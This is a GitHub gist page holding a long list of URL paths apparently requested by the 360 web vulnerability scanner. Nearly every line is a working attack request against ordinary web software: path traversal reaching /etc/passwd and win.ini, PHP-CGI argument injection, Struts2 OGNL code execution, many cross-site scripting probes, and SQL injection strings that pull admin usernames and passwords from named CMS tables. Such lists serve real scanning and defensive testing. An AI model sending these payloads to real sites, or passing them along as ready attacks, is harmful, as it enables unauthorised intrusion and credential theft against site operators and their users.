Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

/360 not with get or post.list

Created December 6, 2014 06:07
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
  • Save anonymous/bd5a76ee8ced7ef12f11 to your computer and use it in GitHub Desktop.
Save anonymous/bd5a76ee8ced7ef12f11 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
360 not with get or post.list
/robots.txt
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/jsky_web_scanner_test_file.txt
/nosec_Web_Scanner_Test.dll
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/wp-admin
/admin.php
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/dede/
/administrator/
/user
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/TRACE_test
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/TRACK_test
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/_vti_bin/_vti_adm/admin.dll
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/_vti_bin/_vti_aut/author.dll
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/_vti_bin/shtml.exe?_vti_rpc
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/server-info
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/server-status
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/jmx-console/
/.../.../.../.../.../.../.../.../windows/win.ini
/web-console/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/webscan360noThisFile*~1*/.aspx
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/etc/passwd
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/phpMyAdmin/show_config_errors.php
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/xampp/index.php
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/?search=just_test_not_find_href
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/$
/.../.../.../.../.../.../.../.../etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/solr/dev/admin/
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%3Cscript%3Ealert(42873).do
/level/15/exec/-/show/running-config/CR
/%3Cscript%20s%3Ealert(42873)
/plugins/weathermap/weathermap-cacti-plugin.php
/?%22onmouseover='prompt(42873)'bad=%22%3E
/%22%3E%3CsCrIpT%3Eprompt(42873)
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/icons/index
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/icons/small/index
/'IHLD
/install.php
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/extras/curltest.php?url=file://curltest.php
/.svn/entries
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet/
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/flow.php?step=login
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/webscan_360_cn.html
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/webscan_360_cn.html
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
